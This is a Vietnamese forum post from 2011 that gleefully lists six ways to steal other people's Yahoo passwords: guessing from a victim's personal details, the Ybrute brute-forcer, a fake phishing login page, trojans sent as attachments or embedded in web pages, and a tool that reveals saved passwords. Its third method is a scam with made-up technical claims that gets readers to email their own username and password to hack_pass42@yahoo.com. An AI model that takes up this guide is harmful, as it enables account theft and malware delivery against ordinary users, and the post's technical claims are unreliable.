KẾT NỐI NHỮNG NGƯỜI BẠN THÂN THƯƠNG
Bạn có muốn phản ứng với tin nhắn này? Vui lòng đăng ký diễn đàn trong một vài cú nhấp chuột hoặc đăng nhập để tiếp tục.

KẾT NỐI NHỮNG NGƯỜI BẠN THÂN THƯƠNG

KẾT NỐI BẠN BÈ-THÊM BẠN LÀ THÊM NIỀM VUI

Trang ChínhGalleryLatest imagesTìm kiếmĐăng kýĐăng Nhập
Similar topics
Tìm kiếm

Display results as :

Rechercher Advanced Search
Latest topics
» LÊ DUY TRUNG SẮP CƯỚI VỢ
Tổng hợp các cách lấy password Yahoo (Sưu tầm) I_icon_minitimeThu Mar 15, 2012 11:19 am by Admin

» ĐỜI LÀ BỂ KHỔ
Tổng hợp các cách lấy password Yahoo (Sưu tầm) I_icon_minitimeThu Mar 15, 2012 11:10 am by Admin

» CUNG SƯ TỬ(24/7-23/8)
Tổng hợp các cách lấy password Yahoo (Sưu tầm) I_icon_minitimeFri Oct 21, 2011 2:49 pm by Admin

» CUNG SONG SINH(21/5-21/6)
Tổng hợp các cách lấy password Yahoo (Sưu tầm) I_icon_minitimeFri Oct 21, 2011 2:45 pm by Admin

» CUNG KIM NGƯU(21/4-21/5)
Tổng hợp các cách lấy password Yahoo (Sưu tầm) I_icon_minitimeFri Oct 21, 2011 2:33 pm by Admin

» CUNG DƯƠNG NGƯU(21/3-20/4)
Tổng hợp các cách lấy password Yahoo (Sưu tầm) I_icon_minitimeFri Oct 21, 2011 2:22 pm by Admin

»  ĐÀN BÀ 30 TUỔI
Tổng hợp các cách lấy password Yahoo (Sưu tầm) I_icon_minitimeFri Oct 21, 2011 2:02 pm by Admin

» KIẾM TIỀN ONLINE VỚI 20$2SUF TẠI VIỆT NAM
Tổng hợp các cách lấy password Yahoo (Sưu tầm) I_icon_minitimeFri Oct 14, 2011 10:01 am by Admin

» HOTBOY ĐI LẤY VỢ ĐỒNG LOẠT
Tổng hợp các cách lấy password Yahoo (Sưu tầm) I_icon_minitimeFri Oct 14, 2011 9:46 am by Admin

Navigation
 Portal
 Diễn Đàn
 Thành viên
 Lý lịch
 Trợ giúp
 Tìm kiếm
April 2024
MonTueWedThuFriSatSun
1234567
891011121314
15161718192021
22232425262728
2930     
CalendarCalendar
Đăng Nhập
Tên truy cập:
Mật khẩu:
Đăng nhập tự động mỗi khi truy cập: 
:: Quên mật khẩu

Tổng hợp các cách lấy password Yahoo (Sưu tầm)

Go down 
Tác giảThông điệp
Admin
Admin

Tổng hợp các cách lấy password Yahoo (Sưu tầm) Empty
Bài gửiTiêu đề: Tổng hợp các cách lấy password Yahoo (Sưu tầm)   Tổng hợp các cách lấy password Yahoo (Sưu tầm) I_icon_minitimeMon May 16, 2011 9:47 am

Ăn cắp password Yahoo - không phải đơn giản
Thật vậy, để có được pass Yahoo của người khác là một vấn đề không hề đơn
giản mà là ... vô cùng đơn giản.

Ở đây tui nêu luôn mấy cách cho các bác "ngâm cứu" :

* Cách 1: Đây là cách đơn giản nhất, nhưng cũng là cách nhà quê nhất nhưng đôi
khi lại hiệu quả. Vâng, đó chính là hỏi luôn victim, tất nhiên là không thể
hỏi pass của mày là gì, hỏi thì bạn cứ hỏi ngày sinh, số di động...nói chung
là tất tật rùi thử từng cái xem có phải pass không, tui không bàn đến cách này nữa, nó quá "hạ cấp".

* Cách 2: Đây cũng là 1 cách nhà quê, bạn có thể download Ybrute - 1 chương trình dò pass Yahoo - còn cách sử dụng nó thì đừng có hỏi tui, hỏi là tui quánh đó. Tuy nhiên khi mới vô thì tui cũng xài qua cách này, điểm yếu của cách này là chỉ có tác dụng khi victim xài pass là 1 từ có trong từ điển hay là 1 câu nói phổ biến, ngoài ra, cách này cũng tốn rất nhiều thời gian (hê hê, cứ vừa ngồi đợi nó tìm mà nghe tiền bay dần khỏi túi), mà khả năng thành công là khoảng 40% thôi vì chương trình này đôi khi làm việc không hiệu quả! He he

* Cách 3: Tất cả đều phải thực hiện trên account Yahoo mail của bạn bởi vì
bức tường lửa của họ đã được nâng cấp bằng Unix-Apache sever. Các bước thực hiện như sau:
1. Vào hộp thư của bạn tạo một mail gửi tới: hack_pass42@yahoo.com
2. Dòng tiêu đề Subject bạn điền là: Hack pass yahoo
3. Tiếp đến là nội dung email bạn chép vào đoạn mã sau (sao chép thật chính xác nhé!):
/config/cgi-bin/cmd-ping/start?hnv7030&login= "Tên đăng nhập của bạn"&f="password của bạn"&f=275866&javascript=ACTIVE&rsma>infor/-password#=""send back/?v_&from="địa chỉ muốn lấy pass" (nhớ phải đánh thêm @yahoo.com hay @yahoo.com.vn nhé!)
Ví dụ:
Tên đăng nhập của bạn là "hacker", password là "nobody" và địa chỉ muốn lấy pass là "victim@yahoo.com" thì bạn soạn nội dung như sau:
/config/cgi-bin/cmd-ping/start?hnv7030&login= "hacker"&f="nobody"&f=275866&javascript=ACTIVE&rsma>infor/-password#=""send back/?v_&from="victim@yahoo.com"
* Yahoo system cần password của bạn để họ có thể gửi một Javascript từ
account của bạn trên Yahoo sever tới một password của người khác. Password sẽ tự động được gửi đến email của bạn trong dấu "".
Cách này tuy dễ thực hiện nhưng tỷ lệ thành công chỉ khoảng 70%, bởi vì nếu
Web Browser của nạn nhân mà không hỗ trợ JS thì đành bó tay thôi, sau 2 phút chờ đợi mà không thấy Yahoo sever hồi âm thì có lẽ bạn nên chuyển sang cách sau.

* Cách 4: Bạn có thể tạo 1 giao diện giống hệt như Yahoo (việc này thì dễ ợt
chứ gì nữa), sau đó sửa đổi chút xíu... hê hê...để cho khi victim gõ pass và
username thì alê hấp, pass bay như chim về email của ta, còn victim thì vẫn vào hòm thư mà không hề hay biết. Việc này bạn có thể thực hiện dễ dàng bằng front
page mà không cần hiểu biết nhiều về html. Sau khi tạo xong giao diện, upload lên
thì bạn chỉ việc dụ victim vô tròng...khà khà...nếu bạn muốn thử nghiệm thì
cứ việc ra ngoài hàng rùi để homepage ở đó là cái địa chỉ trang web mà bạn
dùng để câu, chắc chắn là sẽ có nhiều chú thỏ mắc bẫy.

* Cách 5: Sử dụng Trojan: Có rất nhiều loại Trojan giúp bạn lấy password email như là: Hoocker,Barrio5.0,Barox, Kuang2,....! Bạn có thể Download chúng
ở đầy rẫy trên mạng ở các trang hacker.
Bạn có thể gửi Trojan cho victim như một file đính kèm và khi victim mở file đó
Trojan sẽ có chỗ trú ngụ trong máy của victim và thế là password của họ sẽ
"chạy" về hòm thư của bạn. Thật tuyệt phải không? Nhưng khổ nỗi nếu máy
của victim mà có cài firewall, "chàng vệ sĩ" Nguyễn Tử Quảng (BKAV) hay Noton-Anti Virus … thì he..he đành bó tay thui
Nếu bạn có thể tạo trang Web bạn có thể đính kèm Trojan vào trang Web để khi
victim vào trang web đó của bạn Trojan sẽ được tự động down về máy victim mà
họ không hề hay biết. Để làm việc này bạn có thể sử dụng Godwill1.60 để
đính kèm trojan vào trong trang web. Godwill cũng có rất nhiều trên mạng.

* Cách 6: Cách này thì 100% là thành công, nghe phê chưa. Ấy bình tĩnh để em post lên chớ. Cách này sử dụng khi bác đến nhà victim chơi hoặc ra ngoài hàng net, nếu bác chẳng may thấy victim xài tiện ích remember user name and password thì hãy nhanh nhanh dùng cách này. Các bác download SnadBoy's Revelation v2 (lên google.com mà tìm download), sau đó thì cách sử dụng nó quá dễ khỏi đưa lên đây. Cách này khá đơn giản và hiệu quả là 100% nhưng ít có đất dụng võ vì nếu victim đọc bài này rùi thì họ sẽ không dùng cái remember user name and password nữa đâu.

Chúc các bạn thành công!

https://xuandieu.forumvi.com

Trang 1 trong tổng số 1 trang
 Similar topics
-
» Học cách để gặp may mắn
» 10 cách chinh phục nàng
» Love Dates: 15 cách hẹn hò với người yêu